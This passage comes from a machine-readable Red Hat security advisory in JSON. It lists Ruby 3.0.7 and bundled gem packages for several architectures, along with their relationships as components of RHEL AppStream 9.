"purl": "pkg:rpm/redhat/rubygem-psych@3.3.2-166.el9_7?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "ruby-debugsource-0:3.0.7-166.el9_7.aarch64",
"product": {
"name": "ruby-debugsource-0:3.0.7-166.el9_7.aarch64",
"product_id": "ruby-debugsource-0:3.0.7-166.el9_7.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-debugsource@3.0.7-166.el9_7?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "ruby-debuginfo-0:3.0.7-166.el9_7.aarch64",
"product": {
"name": "ruby-debuginfo-0:3.0.7-166.el9_7.aarch64",
"product_id": "ruby-debuginfo-0:3.0.7-166.el9_7.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-debuginfo@3.0.7-166.el9_7?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "ruby-libs-debuginfo-0:3.0.7-166.el9_7.aarch64",
"product": {
"name": "ruby-libs-debuginfo-0:3.0.7-166.el9_7.aarch64",
"product_id": "ruby-libs-debuginfo-0:3.0.7-166.el9_7.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-libs-debuginfo@3.0.7-166.el9_7?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "rubygem-bigdecimal-debuginfo-0:3.0.0-166.el9_7.aarch64",
"product": {
"name": "rubygem-bigdecimal-debuginfo-0:3.0.0-166.el9_7.aarch64",
"product_id": "rubygem-bigdecimal-debuginfo-0:3.0.0-166.el9_7.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-bigdecimal-debuginfo@3.0.0-166.el9_7?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "rubygem-io-console-debuginfo-0:0.5.7-166.el9_7.aarch64",
"product": {
"name": "rubygem-io-console-debuginfo-0:0.5.7-166.el9_7.aarch64",
"product_id": "rubygem-io-console-debuginfo-0:0.5.7-166.el9_7.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-io-console-debuginfo@0.5.7-166.el9_7?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "rubygem-json-debuginfo-0:2.5.1-166.el9_7.aarch64",
"product": {
"name": "rubygem-json-debuginfo-0:2.5.1-166.el9_7.aarch64",
"product_id": "rubygem-json-debuginfo-0:2.5.1-166.el9_7.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-json-debuginfo@2.5.1-166.el9_7?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "rubygem-psych-debuginfo-0:3.3.2-166.el9_7.aarch64",
"product": {
"name": "rubygem-psych-debuginfo-0:3.3.2-166.el9_7.aarch64",
"product_id": "rubygem-psych-debuginfo-0:3.3.2-166.el9_7.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-psych-debuginfo@3.3.2-166.el9_7?arch=aarch64"
}
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "ruby-0:3.0.7-166.el9_7.ppc64le",
"product": {
"name": "ruby-0:3.0.7-166.el9_7.ppc64le",
"product_id": "ruby-0:3.0.7-166.el9_7.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby@3.0.7-166.el9_7?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "ruby-devel-0:3.0.7-166.el9_7.ppc64le",
"product": {
"name": "ruby-devel-0:3.0.7-166.el9_7.ppc64le",
"product_id": "ruby-devel-0:3.0.7-166.el9_7.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-devel@3.0.7-166.el9_7?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "ruby-libs-0:3.0.7-166.el9_7.ppc64le",
"product": {
"name": "ruby-libs-0:3.0.7-166.el9_7.ppc64le",
"product_id": "ruby-libs-0:3.0.7-166.el9_7.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-libs@3.0.7-166.el9_7?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "rubygem-bigdecimal-0:3.0.0-166.el9_7.ppc64le",
"product": {
"name": "rubygem-bigdecimal-0:3.0.0-166.el9_7.ppc64le",
"product_id": "rubygem-bigdecimal-0:3.0.0-166.el9_7.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-bigdecimal@3.0.0-166.el9_7?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "rubygem-io-console-0:0.5.7-166.el9_7.ppc64le",
"product": {
"name": "rubygem-io-console-0:0.5.7-166.el9_7.ppc64le",
"product_id": "rubygem-io-console-0:0.5.7-166.el9_7.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-io-console@0.5.7-166.el9_7?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "rubygem-json-0:2.5.1-166.el9_7.ppc64le",
"product": {
"name": "rubygem-json-0:2.5.1-166.el9_7.ppc64le",
"product_id": "rubygem-json-0:2.5.1-166.el9_7.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-json@2.5.1-166.el9_7?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "rubygem-psych-0:3.3.2-166.el9_7.ppc64le",
"product": {
"name": "rubygem-psych-0:3.3.2-166.el9_7.ppc64le",
"product_id": "rubygem-psych-0:3.3.2-166.el9_7.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-psych@3.3.2-166.el9_7?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "ruby-debugsource-0:3.0.7-166.el9_7.ppc64le",
"product": {
"name": "ruby-debugsource-0:3.0.7-166.el9_7.ppc64le",
"product_id": "ruby-debugsource-0:3.0.7-166.el9_7.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-debugsource@3.0.7-166.el9_7?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "ruby-debuginfo-0:3.0.7-166.el9_7.ppc64le",
"product": {
"name": "ruby-debuginfo-0:3.0.7-166.el9_7.ppc64le",
"product_id": "ruby-debuginfo-0:3.0.7-166.el9_7.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-debuginfo@3.0.7-166.el9_7?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "ruby-libs-debuginfo-0:3.0.7-166.el9_7.ppc64le",
"product": {
"name": "ruby-libs-debuginfo-0:3.0.7-166.el9_7.ppc64le",
"product_id": "ruby-libs-debuginfo-0:3.0.7-166.el9_7.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-libs-debuginfo@3.0.7-166.el9_7?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "rubygem-bigdecimal-debuginfo-0:3.0.0-166.el9_7.ppc64le",
"product": {
"name": "rubygem-bigdecimal-debuginfo-0:3.0.0-166.el9_7.ppc64le",
"product_id": "rubygem-bigdecimal-debuginfo-0:3.0.0-166.el9_7.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-bigdecimal-debuginfo@3.0.0-166.el9_7?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "rubygem-io-console-debuginfo-0:0.5.7-166.el9_7.ppc64le",
"product": {
"name": "rubygem-io-console-debuginfo-0:0.5.7-166.el9_7.ppc64le",
"product_id": "rubygem-io-console-debuginfo-0:0.5.7-166.el9_7.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-io-console-debuginfo@0.5.7-166.el9_7?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "rubygem-json-debuginfo-0:2.5.1-166.el9_7.ppc64le",
"product": {
"name": "rubygem-json-debuginfo-0:2.5.1-166.el9_7.ppc64le",
"product_id": "rubygem-json-debuginfo-0:2.5.1-166.el9_7.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-json-debuginfo@2.5.1-166.el9_7?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "rubygem-psych-debuginfo-0:3.3.2-166.el9_7.ppc64le",
"product": {
"name": "rubygem-psych-debuginfo-0:3.3.2-166.el9_7.ppc64le",
"product_id": "rubygem-psych-debuginfo-0:3.3.2-166.el9_7.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-psych-debuginfo@3.3.2-166.el9_7?arch=ppc64le"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "ruby-default-gems-0:3.0.7-166.el9_7.noarch",
"product": {
"name": "ruby-default-gems-0:3.0.7-166.el9_7.noarch",
"product_id": "ruby-default-gems-0:3.0.7-166.el9_7.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-default-gems@3.0.7-166.el9_7?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "rubygem-bundler-0:2.2.33-166.el9_7.noarch",
"product": {
"name": "rubygem-bundler-0:2.2.33-166.el9_7.noarch",
"product_id": "rubygem-bundler-0:2.2.33-166.el9_7.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-bundler@2.2.33-166.el9_7?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "rubygem-irb-0:1.3.5-166.el9_7.noarch",
"product": {
"name": "rubygem-irb-0:1.3.5-166.el9_7.noarch",
"product_id": "rubygem-irb-0:1.3.5-166.el9_7.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-irb@1.3.5-166.el9_7?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "rubygem-minitest-0:5.14.2-166.el9_7.noarch",
"product": {
"name": "rubygem-minitest-0:5.14.2-166.el9_7.noarch",
"product_id": "rubygem-minitest-0:5.14.2-166.el9_7.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-minitest@5.14.2-166.el9_7?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "rubygem-power_assert-0:1.2.1-166.el9_7.noarch",
"product": {
"name": "rubygem-power_assert-0:1.2.1-166.el9_7.noarch",
"product_id": "rubygem-power_assert-0:1.2.1-166.el9_7.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-power_assert@1.2.1-166.el9_7?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "rubygem-rake-0:13.0.3-166.el9_7.noarch",
"product": {
"name": "rubygem-rake-0:13.0.3-166.el9_7.noarch",
"product_id": "rubygem-rake-0:13.0.3-166.el9_7.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-rake@13.0.3-166.el9_7?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "rubygem-rbs-0:1.4.0-166.el9_7.noarch",
"product": {
"name": "rubygem-rbs-0:1.4.0-166.el9_7.noarch",
"product_id": "rubygem-rbs-0:1.4.0-166.el9_7.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-rbs@1.4.0-166.el9_7?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "rubygem-rdoc-0:6.3.4.1-166.el9_7.noarch",
"product": {
"name": "rubygem-rdoc-0:6.3.4.1-166.el9_7.noarch",
"product_id": "rubygem-rdoc-0:6.3.4.1-166.el9_7.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-rdoc@6.3.4.1-166.el9_7?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "rubygem-rexml-0:3.2.5-166.el9_7.noarch",
"product": {
"name": "rubygem-rexml-0:3.2.5-166.el9_7.noarch",
"product_id": "rubygem-rexml-0:3.2.5-166.el9_7.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-rexml@3.2.5-166.el9_7?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "rubygem-rss-0:0.2.9-166.el9_7.noarch",
"product": {
"name": "rubygem-rss-0:0.2.9-166.el9_7.noarch",
"product_id": "rubygem-rss-0:0.2.9-166.el9_7.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-rss@0.2.9-166.el9_7?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "rubygem-test-unit-0:3.3.7-166.el9_7.noarch",
"product": {
"name": "rubygem-test-unit-0:3.3.7-166.el9_7.noarch",
"product_id": "rubygem-test-unit-0:3.3.7-166.el9_7.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-test-unit@3.3.7-166.el9_7?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "rubygem-typeprof-0:0.15.2-166.el9_7.noarch",
"product": {
"name": "rubygem-typeprof-0:0.15.2-166.el9_7.noarch",
"product_id": "rubygem-typeprof-0:0.15.2-166.el9_7.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-typeprof@0.15.2-166.el9_7?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "rubygems-0:3.2.33-166.el9_7.noarch",
"product": {
"name": "rubygems-0:3.2.33-166.el9_7.noarch",
"product_id": "rubygems-0:3.2.33-166.el9_7.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygems@3.2.33-166.el9_7?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "rubygems-devel-0:3.2.33-166.el9_7.noarch",
"product": {
"name": "rubygems-devel-0:3.2.33-166.el9_7.noarch",
"product_id": "rubygems-devel-0:3.2.33-166.el9_7.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygems-devel@3.2.33-166.el9_7?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ruby-doc-0:3.0.7-166.el9_7.noarch",
"product": {
"name": "ruby-doc-0:3.0.7-166.el9_7.noarch",
"product_id": "ruby-doc-0:3.0.7-166.el9_7.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-doc@3.0.7-166.el9_7?arch=noarch"
}
}
}
],
"category": "architecture",
"name": "noarch"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-0:3.0.7-166.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:ruby-0:3.0.7-166.el9_7.aarch64"
},
"product_reference": "ruby-0:3.0.7-166.el9_7.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-0:3.0.7-166.el9_7.i686 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:ruby-0:3.0.7-166.el9_7.i686"
},
"product_reference": "ruby-0:3.0.7-166.el9_7.i686",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-0:3.0.7-166.el9_7.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:ruby-0:3.0.7-166.el9_7.ppc64le"
},
"product_reference": "ruby-0:3.0.7-166.el9_7.ppc64le",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-0:3.0.7-166.el9_7.s390x as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:ruby-0:3.0.7-166.el9_7.s390x"
},
"product_reference": "ruby-0:3.0.7-166.el9_7.s390x",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-0:3.0.7-166.el9_7.src as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:ruby-0:3.0.7-166.el9_7.src"
},
"product_reference": "ruby-0:3.0.7-166.el9_7.src",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-0:3.0.7-166.el9_7.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:ruby-0:3.0.7-166.el9_7.x86_64"
},
"product_reference": "ruby-0:3.0.7-166.el9_7.x86_64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-debuginfo-0:3.0.7-166.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:ruby-debuginfo-0:3.0.7-166.el9_7.aarch64"
},
"product_reference": "ruby-debuginfo-0:3.0.7-166.el9_7.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-debuginfo-0:3.0.7-166.el9_7.i686 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:ruby-debuginfo-0:3.0.7-166.el9_7.i686"
},
"product_reference": "ruby-debuginfo-0:3.0.7-166.el9_7.i686",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-debuginfo-0:3.0.7-166.el9_7.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:ruby-debuginfo-0:3.0.7-166.el9_7.ppc64le"
},
"product_reference": "ruby-debuginfo-0:3.0.7-166.el9_7.ppc64le",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-debuginfo-0:3.0.7-166.el9_7.s390x as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:ruby-debuginfo-0:3.0.7-166.el9_7.s390x"
},
"product_reference": "ruby-debuginfo-0:3.0.7-166.el9_7.s390x",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-debuginfo-0:3.0.7-166.el9_7.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:ruby-debuginfo-0:3.0.7-166.el9_7.x86_64"
},
"product_reference": "ruby-debuginfo-0:3.0.7-166.el9_7.x86_64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-debugsource-0:3.0.7-166.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:ruby-debugsource-0:3.0.7-166.el9_7.aarch64"
},
"product_reference": "ruby-debugsource-0:3.0.7-166.el9_7.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-debugsource-0:3.0.7-166.el9_7.i686 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:ruby-debugsource-0:3.0.7-166.el9_7.i686"
},
"product_reference": "ruby-debugsource-0:3.0.7-166.el9_7.i686",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-debugsource-0:3.0.7-166.el9_7.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:ruby-debugsource-0:3.0.7-166.el9_7.ppc64le"
},
"product_reference": "ruby-debugsource-0:3.0.7-166.el9_7.ppc64le",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-debugsource-0:3.0.7-166.el9_7.s390x as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:ruby-debugsource-0:3.0.7-166.el9_7.s390x"
},
"product_reference": "ruby-debugsource-0:3.0.7-166.el9_7.s390x",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-debugsource-0:3.0.7-166.el9_7.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:ruby-debugsource-0:3.0.7-166.el9_7.x86_64"
},
"product_reference": "ruby-debugsource-0:3.0.7-166.el9_7.x86_64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-default-gems-0:3.0.7-166.el9_7.noarch as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:ruby-default-gems-0:3.0.7-166.el9_7.noarch"
},
"product_reference": "ruby-default-gems-0:3.0.7-166.el9_7.noarch",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-devel-0:3.0.7-166.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:ruby-devel-0:3.0.7-166.el9_7.aarch64"
},
"product_reference": "ruby-devel-0:3.0.7-166.el9_7.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-devel-0:3.0.7-166.el9_7.i686 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:ruby-devel-0:3.0.7-166.el9_7.i686"
},
"product_reference": "ruby-devel-0:3.0.7-166.el9_7.i686",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-devel-0:3.0.7-166.el9_7.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:ruby-devel-0:3.0.7-166.el9_7.ppc64le"
},
"product_reference": "ruby-devel-0:3.0.7-166.el9_7.ppc64le",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-devel-0:3.0.7-166.el9_7.s390x as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:ruby-devel-0:3.0.7-166.el9_7.s390x"
},
"product_reference": "ruby-devel-0:3.0.7-166.el9_7.s390x",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-devel-0:3.0.7-166.el9_7.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:ruby-devel-0:3.0.7-166.el9_7.x86_64"
},
"product_reference": "ruby-devel-0:3.0.7-166.el9_7.x86_64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-doc-0:3.0.7-166.el9_7.noarch as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:ruby-doc-0:3.0.7-166.el9_7.noarch"
},
"product_reference": "ruby-doc-0:3.0.7-166.el9_7.noarch",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-libs-0:3.0.7-166.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:ruby-libs-0:3.0.7-166.el9_7.aarch64"
},
"product_reference": "ruby-libs-0:3.0.7-166.el9_7.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-libs-0:3.0.7-166.el9_7.i686 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:ruby-libs-0:3.0.7-166.el9_7.i686"
},
"product_reference": "ruby-libs-0:3.0.7-166.el9_7.i686",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-libs-0:3.0.7-166.el9_7.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:ruby-libs-0:3.0.7-166.el9_7.ppc64le"
},
"product_reference": "ruby-libs-0:3.0.7-166.el9_7.ppc64le",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-libs-0:3.0.7-166.el9_7.s390x as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:ruby-libs-0:3.0.7-166.el9_7.s390x"
},
"product_reference": "ruby-libs-0:3.0.7-166.el9_7.s390x",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-libs-0:3.0.7-166.el9_7.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:ruby-libs-0:3.0.7-166.el9_7.x86_64"
},
"product_reference": "ruby-libs-0:3.0.7-166.el9_7.x86_64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-libs-debuginfo-0:3.0.7-166.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:ruby-libs-debuginfo-0:3.0.7-166.el9_7.aarch64"
},
"product_reference": "ruby-libs-debuginfo-0:3.0.7-166.el9_7.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-libs-debuginfo-0:3.0.7-166.el9_7.i686 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:ruby-libs-debuginfo-0:3.0.7-166.el9_7.i686"
},
"product_reference": "ruby-libs-debuginfo-0:3.0.7-166.el9_7.i686",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-libs-debuginfo-0:3.0.7-166.el9_7.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:ruby-libs-debuginfo-0:3.0.7-166.el9_7.ppc64le"
},
"product_reference": "ruby-libs-debuginfo-0:3.0.7-166.el9_7.ppc64le",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-libs-debuginfo-0:3.0.7-166.el9_7.s390x as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:ruby-libs-debuginfo-0:3.0.7-166.el9_7.s390x"
},
"product_reference": "ruby-libs-debuginfo-0:3.0.7-166.el9_7.s390x",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-libs-debuginfo-0:3.0.7-166.el9_7.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:ruby-libs-debuginfo-0:3.0.7-166.el9_7.x86_64"
},
"product_reference": "ruby-libs-debuginfo-0:3.0.7-166.el9_7.x86_64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-bigdecimal-0:3.0.0-166.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-bigdecimal-0:3.0.0-166.el9_7.aarch64"
},
"product_reference": "rubygem-bigdecimal-0:3.0.0-166.el9_7.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-bigdecimal-0:3.0.0-166.el9_7.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-bigdecimal-0:3.0.0-166.el9_7.ppc64le"
},
"product_reference": "rubygem-bigdecimal-0:3.0.0-166.el9_7.ppc64le",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-bigdecimal-0:3.0.0-166.el9_7.s390x as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-bigdecimal-0:3.0.0-166.el9_7.s390x"
},
"product_reference": "rubygem-bigdecimal-0:3.0.0-166.el9_7.s390x",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-bigdecimal-0:3.0.0-166.el9_7.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-bigdecimal-0:3.0.0-166.el9_7.x86_64"
},
"product_reference": "rubygem-bigdecimal-0:3.0.0-166.el9_7.x86_64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "rubygem-bigdecimal-debuginfo-0:3.0.0-166.el9_7.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 9)",
"product_id": "AppStream-9.7.0.Z.MAIN:rubygem-bigdecimal-debuginfo-0:3.0.0-166.el9_7.aarch64"
},
"product_reference": "rubygem-bigdecimal-debuginfo-0:3.0.0-166.el9_7.aarch64",
"relates_to_product_reference": "AppStream-9.7.0.Z.MAIN"
},
{
"category": "default_component_of",
"full_product_name": {
